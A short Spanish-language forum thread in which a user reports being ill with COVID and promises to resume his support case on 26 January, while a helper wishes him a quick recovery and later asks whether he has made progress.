P.D.: Si tardo en responder que no te extrañe, voy con muy poco tiempo para el foro y es normal. Pero seguiremos el caso hasta el final.

Muchas gracias a todos por su ayuda, les comento que estoy con COVID y espero estar de regreso el 26 de enero. Las disculpas por no reportarme pero en cuanto me recupere voy a continuar con el caso. Nuevamente muchas gracias. Cuidense mucho y que Dios nos bendiga a todos! un abrazo!

De nada @hectordj69.

Ok, tranquilo no pasa nada @hectordj69. Por aquí te esperamos, sin problema, pero vuelve. Espero que pases el COVID de forma leve y que sea poca cosa y que en unos días ya estés bien.

Pues el día 26 por aquí te esperamos.

Muchas gracias a ti por tus buenas palabras y por todo tu último mensaje de agradecimiento. Comentarios como el tuyo son los que me siguen dando ganas y lo que realmente más me motiva para seguir atendiendo nuevos casos. Que te den comentarios como este último. No tiene precio.

Recupérate y nos comentas.

Salu2.

Hola, buenas @hectordj69

He visto que muy recientemente te has conectado al foro. Espero que ya estés mejor.

¿Pudiste realizar algún avance?

Salu2.